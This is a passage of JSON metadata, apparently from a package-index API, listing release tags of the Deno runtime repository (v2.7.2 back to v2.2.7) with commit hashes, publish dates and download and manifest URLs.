:"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denolan